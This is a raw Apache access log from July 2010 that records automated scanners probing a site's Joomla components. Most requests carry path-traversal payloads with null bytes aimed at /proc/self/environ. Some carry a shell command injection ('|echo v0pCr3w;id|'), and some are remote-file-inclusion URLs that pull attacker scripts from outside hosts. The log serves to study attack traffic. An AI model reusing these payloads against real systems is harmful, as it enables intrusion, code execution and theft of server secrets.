213.215.178.34 - - [26/Jul/2010:05:14:42 +0200] "GET /index.php?option=com_perchaimageattach&controller=%7Cecho%20v0pCr3w%3Bid%7C HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:14:55 +0200] "GET /logs/access_log/index.php?option=com_perchaimageattach&controller=%7Cecho%20v0pCr3w%3Bid%7C HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:14:55 +0200] "GET /index.php?option=com_perchaimageattach&controller=%7Cecho%20v0pCr3w%3Bid%7C HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:14:56 +0200] "GET /logs/index.php?option=com_perchaimageattach&controller=%7Cecho%20v0pCr3w%3Bid%7C HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
112.104.57.22 - - [26/Jul/2010:05:16:24 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:05:16:24 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:05:16:25 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:05:16:25 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:05:16:25 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:05:16:25 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:05:16:27 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:05:16:27 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
112.104.57.22 - - [26/Jul/2010:05:16:28 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
86.109.96.188 - - [26/Jul/2010:05:18:50 +0200] "GET /logs/access_log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 352 "-" "Mozilla/5.0"
86.109.96.188 - - [26/Jul/2010:05:18:50 +0200] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 341 "-" "Mozilla/5.0"
86.109.96.188 - - [26/Jul/2010:05:18:50 +0200] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 336 "-" "Mozilla/5.0"
78.41.204.220 - - [26/Jul/2010:05:22:08 +0200] "GET /logs//?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 801 "-" "libwww-perl/5.813"
78.41.204.220 - - [26/Jul/2010:05:22:08 +0200] "GET //?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.813"
66.249.65.153 - - [26/Jul/2010:05:27:01 +0200] "GET /logs/error_log HTTP/1.1" 200 17064 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.215.178.34 - - [26/Jul/2010:05:31:08 +0200] "GET /logs/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:31:09 +0200] "GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:31:15 +0200] "GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:31:31 +0200] "GET /logs/access_log/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:31:32 +0200] "GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.215.178.34 - - [26/Jul/2010:05:31:32 +0200] "GET /logs/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
64.6.98.41 - - [26/Jul/2010:05:33:17 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:05:33:17 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:05:33:17 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:05:33:20 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:05:33:20 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:05:33:20 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:05:35:19 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:05:35:19 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.6.98.41 - - [26/Jul/2010:05:35:19 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
216.227.218.75 - - [26/Jul/2010:05:43:58 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.832"
64.34.172.171 - - [26/Jul/2010:05:44:09 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
188.127.248.175 - - [26/Jul/2010:05:44:10 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
93.158.148.30 - - [26/Jul/2010:05:45:05 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
99.198.108.74 - - [26/Jul/2010:05:57:42 +0200] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:05:57:43 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.831"
77.78.97.82 - - [26/Jul/2010:06:05:49 +0200] "GET /logs/?INCLUDE_FOLDER=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 200 796 "-" "plaNETWORK Bot Search"
77.78.97.82 - - [26/Jul/2010:06:05:49 +0200] "GET /?INCLUDE_FOLDER=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 200 559 "-" "plaNETWORK Bot Search"
88.151.103.82 - - [26/Jul/2010:06:06:00 +0200] "GET /?INCLUDE_FOLDER=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 200 559 "-" "plaNETWORK Bot Search"
88.151.103.82 - - [26/Jul/2010:06:06:00 +0200] "GET /logs/?INCLUDE_FOLDER=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 200 796 "-" "plaNETWORK Bot Search"
64.34.172.171 - - [26/Jul/2010:06:10:02 +0200] "GET /logs/access_log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:06:10:02 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:06:10:03 +0200] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
99.198.108.74 - - [26/Jul/2010:06:15:20 +0200] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:06:15:21 +0200] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.831"
216.117.144.54 - - [26/Jul/2010:06:15:35 +0200] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
216.117.144.54 - - [26/Jul/2010:06:15:35 +0200] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
83.93.131.189 - - [26/Jul/2010:06:15:38 +0200] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.93.131.189 - - [26/Jul/2010:06:15:39 +0200] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.93.131.189 - - [26/Jul/2010:06:16:17 +0200] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
216.117.144.54 - - [26/Jul/2010:06:16:51 +0200] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
83.93.131.189 - - [26/Jul/2010:06:19:24 +0200] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.93.131.189 - - [26/Jul/2010:06:19:24 +0200] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
188.127.248.175 - - [26/Jul/2010:06:20:30 +0200] "GET /logs/access_log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:06:20:31 +0200] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:06:20:31 +0200] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
207.46.199.182 - - [26/Jul/2010:06:25:54 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.117.144.54 - - [26/Jul/2010:06:36:36 +0200] "GET /logs/access_log//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.79"
216.117.144.54 - - [26/Jul/2010:06:36:40 +0200] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
216.117.144.54 - - [26/Jul/2010:06:36:41 +0200] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
80.248.211.49 - - [26/Jul/2010:06:38:26 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
66.249.65.153 - - [26/Jul/2010:06:49:40 +0200] "GET /logs/access_log HTTP/1.1" 200 41118 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.199.198 - - [26/Jul/2010:06:53:47 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.117.144.54 - - [26/Jul/2010:06:58:16 +0200] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
80.248.211.49 - - [26/Jul/2010:06:59:45 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.813"
80.248.211.49 - - [26/Jul/2010:06:59:45 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
80.248.211.49 - - [26/Jul/2010:06:59:45 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
91.121.7.123 - - [26/Jul/2010:07:08:23 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
216.227.218.75 - - [26/Jul/2010:07:08:34 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.832"
64.34.172.171 - - [26/Jul/2010:07:08:54 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
188.127.248.175 - - [26/Jul/2010:07:09:33 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
87.98.217.83 - - [26/Jul/2010:07:11:58 +0200] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:07:11:58 +0200] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:07:12:04 +0200] "GET /logs/*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:07:12:04 +0200] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
216.227.218.75 - - [26/Jul/2010:07:15:10 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.832"
216.227.218.75 - - [26/Jul/2010:07:15:10 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.832"
216.227.218.75 - - [26/Jul/2010:07:15:10 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.832"
91.121.7.123 - - [26/Jul/2010:07:16:54 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:07:16:54 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:07:16:54 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
64.34.172.171 - - [26/Jul/2010:07:19:34 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:07:19:35 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.834"
64.34.172.171 - - [26/Jul/2010:07:19:35 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.834"
188.127.248.175 - - [26/Jul/2010:07:21:56 +0200] "GET /logs/access_log//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:07:21:57 +0200] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:07:21:57 +0200] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
91.215.170.13 - - [26/Jul/2010:07:22:05 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:22:13 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:25:32 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:25:32 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:47:29 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
91.215.170.13 - - [26/Jul/2010:07:47:43 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
87.98.217.83 - - [26/Jul/2010:07:56:51 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
87.98.217.83 - - [26/Jul/2010:07:56:52 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
114.108.151.149 - - [26/Jul/2010:08:00:22 +0200] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:01:05 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:04:37 +0200] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
121.78.118.123 - - [26/Jul/2010:08:06:12 +0200] "GET //index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
114.108.151.149 - - [26/Jul/2010:08:06:25 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
121.78.118.123 - - [26/Jul/2010:08:06:34 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
205.234.145.217 - - [26/Jul/2010:08:10:06 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:10:06 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
205.234.145.217 - - [26/Jul/2010:08:10:25 +0200] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
